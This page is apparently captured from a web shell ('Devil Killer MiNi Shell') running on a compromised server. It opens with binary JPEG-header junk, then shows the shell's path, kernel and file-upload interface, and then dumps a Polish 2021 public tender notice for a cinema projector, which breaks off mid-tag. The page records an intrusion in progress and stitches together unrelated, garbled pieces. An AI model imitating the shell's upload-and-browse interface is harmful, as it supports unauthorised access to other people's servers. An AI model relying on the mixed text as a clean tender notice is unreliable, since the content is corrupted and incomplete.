JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210929/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210929/0019654201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Kino wraca do Przasnysza. Zakup profesjonalnego projektora cyfrowego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Dom Kultury im. Stanisława Ostoi-Kotkowskiego w Przasnyszu</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Miejski Dom Kultury w Przasnyszu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000285563</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">3 Maja 16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Przasnysz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">06-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL924 - Ostrołęcki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">297523220</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dyrektor@mdkprzasnysz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mdkprzasnysz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kino wraca do Przasnysza. Zakup profesjonalnego projektora cyfrowego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-502c3a3e-2118-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00196542</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00047771/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Kino wraca do Przasnysza. Zakup profesjonalnego projektora cyfrowego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://miniportal.uzp.gov.pl/WarunkiUslugi.aspx</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://www.mdkprzasnysz.pl/dom-kultury/zamowienia-publiczne</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">[ADMINISTRATOR DANYCH OSOBOWYCH]: <br/><br/>Miejski Dom Kultury im. Stanisława Ostoi - Kotkowskiego z siedzibą przy ul. 3 Maja 16 w Przasnyszu, 06-300 Przasnysz (w dalszej części jako: MDK). <br/><br/>[CELE ORAZ PODSTAWY PRAWNE PRZETWARZANIA DANYCH]:<br/><br/>Państwa dane przetwarzane są w celu wypełnienia obowiązków prawnych ciążących na administratorze w związku z przeprowadzeniem postępowania o udzielenia zamówienia publicznego na podstawie art. 6 ust.1 lit. c RODO i w związku z ustawą z dnia 11 września 2019 roku- Prawo zamówień publicznych. <br/><br/>[CZAS PRZEZ JAKI BĘDZIEMY PRZETWARZAĆ DANE OSOBOWE]:<br/><br/>Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ustawy z dnia 11 września 2019 roku- Prawo zamówień publicznych, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia w sposób gwarantujący nienaruszalność. Jeżeli jednak okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata, Administrator jako zamawiający będzie przechowywał protokół postępowania wraz z załącznikami przez cały okres obowiązywania umowy w sprawie zamówienia publicznego. <br/><br/>[KATEGORIE ODBIORCÓW DANYCH]:<br/>Odbiorcami Państwa danych mogą być podmioty z następujących kategorii:<br/> a) podmioty publiczne upoważnione na podstawie obowiązujących przepisów prawa, w tym osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o przepisy ustawy z dnia 11 września 2019 roku- Prawo zamówień publicznych, <br/> b) podmioty świadczące usługi informatyczne oraz hostingu poczty elektronicznej i strony internetowej działające na zlecenie MDK,<br/> c) podmioty świadczące usługi pocztowe na zlecenie MDK, <br/> d) radcowie prawni oraz inne podmioty świadczące usługi prawne i działające na zlecenie MDK.<br/><br/>[PRZYSŁUGUJĄCE PRAWA]: <br/>W związku z tym, że przetwarzamy Państwa dane osobowe, mają Państwo prawo do:<br/> 1) żądania dostępu do swoich danych osobowych,<br/> 2) żądania sprostowania swoich danych osobowych,<br/> 3) żądania ograniczenia przetwarzania swoich danych osobowych.<br/>Jeżeli uznają Państwo, że Państwa dane osobowe są przetwarzane niezgodnie z wymogami prawa, przysługuje Państwu prawo wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osobowych (ul. Stawki 2, 00-193 Warszawa, https://www.uodo.gov.pl/). <br/><br/>[INFORMACJA CO DO WYMOGU LUB DOBROWOLNOŚCI PODANIA DANYCH ORAZ KONSEKWENCJACH ICH NIEPODANIA]:<br/>Obowiązek podania przez Państwa danych osobowych jest wymogiem ustawowym określonym w przepisach prawa. Konsekwencją nieujawnienia danych będzie brak możliwości uczestniczenia w postępowaniu o udzielenie zamówienia publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 300000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup projektora cyfrowego dla Miejskiego Domu Kultury im. Stanisława Ostoi – Kotkowskiego w Przasnyszu wraz z dostawą, wniesieniem, a także wsparciem technicznym i przeszkoleniem obsługi. W związku z planowaną przebudową Miejskiego Domu Kultury im. Stanisława Ostoi – Kotkowskiego, w tym remontem sali kinowej, przeszkolenie personelu oraz wsparcie techniczne przy montażu będzie miało miejsce w terminie późniejszym, na wniosek Zamawiającego.<br/>Przedmiotem niniejszego zamówienia jest sprzedaż i dostawa poniższych elementów:<br/><br/>1) ,,Projektor kinowy, rozdzielczość 4K, jasność 12.000 lumenów, 3xDLP, źródło światła laserowe RGB – 1 szt.<br/>- cyfrowy projektor kinowy do projekcji 2D,<br/>- pełna zgodność ze standardem DCI,<br/>- typ układu tworzącego obraz DLP – 3 x DMD 0,98<br/>- rozdzielczość rzeczywista 4K (4096 x 2160 pixeli),<br/>- jasność min. 12.000 lumenów,<br/>- kontrast obrazu min. 2.300:1,<br/>- wyposażony w źródło światła typu RGB – 3 niezależne źródła światła<br/>dla każdej z barw podstawowych,<br/>- projektor musi zapewniać zgodność z przestrzenią kolorystyczną<br/>P3 = 100 %, REC2020 ≥ 98 %,<br/>- żywotność źródła światła nie mniej niż 40.000 h,<br/>- modułowa konstrukcja projektora umożliwiająca szybki serwis,<br/>- układ automatyki i pamięci ustawień ostrości i wielkości ogniskowej obiektywu,<br/>- filtry powietrza wielokrotnego użycia, obsługa materiału filmowego HFR,<br/>- poziom hałasu generowanego przez projektor i układ zasilania nie więcej niż 50 dB <br/>(ważona A),<br/>- konsumpcja energii elektrycznej na poziomie nie większym niż 1.4 kW (3W w standby),<br/>- wyposażony w serwer kinowy odpowiedni dla projekcji filmów 2D/3D,<br/>- odtwarzanie treści w rozdzielczości 2K oraz 4K, w tym 4K@60fps,<br/>- odtwarzany system kompresji MPEG-2 (4:2:0 oraz 4:2:2 do 60 fps),<br/>- odtwarzany system kompresji JPEG2000 w rozdzielczości 2K z częstotliwością do 120 fps, w rozdzielczości 2K 3D z częstotliwością do 60 fps dla każdego oka,<br/>- możliwy osiągalny bitrate dla JPEG 2000 powyżej 600 Mbps,<br/>- wyjście dźwięku w standardzie AES/EBU,<br/>- złącza wejściowe dla sygnału z urządzeń źródłowych treści alternatywnych (2x HDMI 2.0a) Złącza GPIO,<br/>- pamięć zbudowana w oparciu o RAID5, ilość pamięci netto min. 1,8 TB,<br/>- złącza komunikacyjne Ethernet, USB 2.0, USB 3.0,<br/>- zarządzanie z poziomu interfejsu Web.<br/>2) Obiektyw - 1 szt.<br/>- obiektyw projekcyjny, wysokokontrastowy, odpowiedni dla kinowego projektora cyfrowego<br/>- zmotoryzowany, umożliwiający wyświetlenie obrazu w dwóch formatach kinowych (FLAT/SCOPE),<br/>- ogniskowa odpowiednia dla warunków projekcyjnych obliczonych w projekcie,<br/>3) Układ do projekcji 3D – 1 szt.<br/>- moduł polaryzacyjny pasywnego systemu 3D,<br/>- odpowiedni dla współpracy z dostarczanym projektorem pracującym w technologii DLP,<br/>- samoczynne włączanie przy zmianie 2D/3D<br/>- przystosowany do wyświetlania obrazu 3D w technologii HFR, w tym 2K 3D prędkość 60 fps dla każdego oka,<br/>- kompatybilny z dostarczanymi okularami 3D.<br/><br/>UWAGA: Dostarczany sprzęt powinien być kompatybilny z dostępnymi na rynku systemami dźwiękowymi, procesorami dźwięku i ekranami elektrycznymi przeznaczonymi do wyświetlania projekcji kinowych. Oferta powinna także obejmować szkolenie obsługi, a także wsparcie techniczne przy podłączeniu. Z uwagi na planowaną przebudowę Miejskiego Domu Kultury im. Stanisława Ostoi – Kotkowskiego w Przasnyszu, szkolenie i wsparcie techniczne odbędzie się w okresie późniejszym. Transport przedmiotu zamówienia powinien być wliczony w cenę. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">38652000-0 - Projektory filmowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30200000-1 - Urządzenia komputerowe</p> <p class="mb-0">38600000-1 - Przyrządy optyczne</p> <p class="mb-0">80511000-9 - Usługi szkolenia personelu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-11-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert Zamawiający kierował się będzie następującym kryterium: <br/><br/>Cena – 60%<br/>Oferta o najniższej cenie brutto otrzyma maksymalną liczbę punktów (60 punktów), każdej następnej, przyznaje się proporcjonalnie mniej punktów, wg wzoru: <br/><br/> Cena minimalna<br/>C = -------------------------------------- x 60 pkt<br/> Cena oferty badanej<br/><br/>Okres gwarancji – 25 %<br/>Oferta o najdłuższym okresie gwarancyjnym otrzyma maksymalną liczbę punktów (25 punktów),<br/><br/>Zamawiający przyzna punkty za powyższe kryterium wg poniższej zasady:<br/>Minimalny okres gwarancji to 12 m-cy.<br/><br/>Za wydłużenie okresu gwarancji punkty będą przyznawane w następujący sposób:<br/>12 m-cy i więcej – 0 pkt.<br/>18 m-cy i więcej – 5 pkt.<br/>24 m-ce i więcej – 10 pkt.<br/>36 m-cy i więcej – 25 pkt.<br/><br/>Zaoferowanie krótszego okresu gwarancji niż wymagane 12 m-cy skutkować będzie odrzuceniem oferty (zgodnie z art. 226 ust. 1 pkt. 5 ustawy).<br/>Do umowy zostanie wpisany okres gwarancji zaproponowany przez Wykonawcę.<br/><br/>Czas reakcji na usterki – 15 %<br/>Oferta o najszybszym czasie reakcji Wykonawcy na wykryte usterki techniczne przedmiotu umowy otrzyma max liczbę punktów (15 punktów).<br/><br/>Zamawiający przyzna punkty za powyższe kryterium wg poniższej zasady:<br/>Opcja nr 1. Pomoc zdalna (telefon, Internet itp.) do 5 godzin lub przyjazd osoby upoważnionej (technika) do 24 godzin – 15 pkt.<br/>Opcja nr 2. Pomoc zdalna (telefon, Internet itp.) pow. 5 godzin do 12 godzin lub przyjazd osoby upoważnionej (technika) pow. 24 godzin do 48 godzin – 5 pkt.<br/>Opcja nr 3. Pomoc zdalna (telefon, Internet itp.) pow. 12 godzin lub przyjazd osoby upoważnionej (technika) pow. 48 godzin – 0 pkt.<br/><br/>Zamawiający dokona oceny ofert w zakresie kryteriów, o których mowa powyżej.<br/>Zamawiający dokona weryfikacji oraz przypisania punktów dla poszczególnych kryteriów oceny oferty oraz wyliczy łączną ocenę punktową oferty (P) wg wzoru:<br/><br/>P= C+G+R<br/><br/>P – łączna ocena <br/>C - oznacza liczbę punktów przyznaną w ramach kryterium Cena.<br/>G - oznacza liczbę punktów przyznaną w ramach kryterium Okres gwarancji.<br/>R - oznacza liczbę punktów przyznaną w ramach kryterium Czas reakcji na usterki.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/><br/>Jeżeli na podstawie art. 248 ust. 2,3 Ustawy PZP nie można dokonać wyboru oferty w przypadku gdy otrzymały taka samą ocenę w kryterium o najwyższej wadze, Zamawiający wzywa Wykonawców którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę, która nie może być wyższa niż zaoferowana w uprzednio złożonych przez nich ofertach. Każde z wymienionych powyżej kryteriów zostało oznaczone odpowiednią wagą, gdzie waga wyznacza istotność danego kryterium przy dokonywaniu oceny oferty. Oferta o najwyższej liczbie punktów, będącą sumą punktów w poszczególnych kryteriach, uznana zostanie za ofertę najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na usterki</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają określone przez Zamawiającego w niniejszej części warunki udziału w postępowaniu, wynikające z art. 112 ust. 2 Ustawy PZP dotyczące:<br/><br/> Posiadania zdolności technicznej i zawodowej:<br/> 1. Zamawiający wymaga wykazu dostaw (co najmniej jedna) o wartości min. 200.000 zł brutto wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz, których dostawy zostały wykonane bądź są wykonywane z dowodami określającymi czy dostawy zostały wykonane w sposób należyty (np. referencje) bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane. W przypadku braku możliwości uzyskania takich potwierdzeń z przyczyn niezależnych od Wykonawcy, składa on oświadczenie. Przez jedną dostawę rozumie się dostawę świadczoną w ramach jednej umowy. Dostawy powinny mieć charakter tożsamy lub pokrewny z przedmiotem zamówienia i odnosić się do urządzeń związanych z funkcjonowaniem kin cyfrowych.<br/><br/> 2. Zamawiający wymaga oświadczenia na temat wykształcenia i kwalifikacji zawodowych Wykonawcy lub kadry kierowniczej Wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.4. Wykonawca o którym mowa w art. 274 ust. 1 ustawy PZP, na wezwanie Zamawiającego, w terminie nie krótszym niż 5 dni od dnia wezwania, składa aktualne na dzień złożenia podmiotowe środki dowodowe, chyba, że Zamawiający jest w posiadaniu lub ma dostęp do tych środków dowodowych, tj. <br/><br/> 1) wykazu dostaw (co najmniej jedna) o wartości min. 200.000 zł brutto wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz, których dostawy zostały wykonane bądź są wykonywane z dowodami określającymi czy dostawy zostały wykonane w sposób należyty (np. referencje) bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane W przypadku braku możliwości uzyskania takich potwierdzeń z przyczyn niezależnych od Wykonawcy, składa on oświadczenie. Przez jedną dostawę rozumie się dostawę świadczoną w ramach jednej umowy.<br/><br/> 2) oświadczenia na temat wykształcenia i kwalifikacji zawodowych wykonawcy lub Kadry kierowniczej Wykonawcy.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy występujący wspólnie muszą ustanowić Pełnomocnika (załączyć pełnomocnictwo) do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/><br/> 2. Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje informacje, korespondencję itp. Wszelkie oświadczenia pełnomocnika Zamawiający uzna za wiążące dla wszystkich Wykonawców składających ofertę wspólną. <br/><br/> 3. Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/><br/> 4. Przed podpisaniem umowy (w przypadku wygrania przetargu) Zamawiający żąda od Wykonawcy kopii umowy regulującą współpracę Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 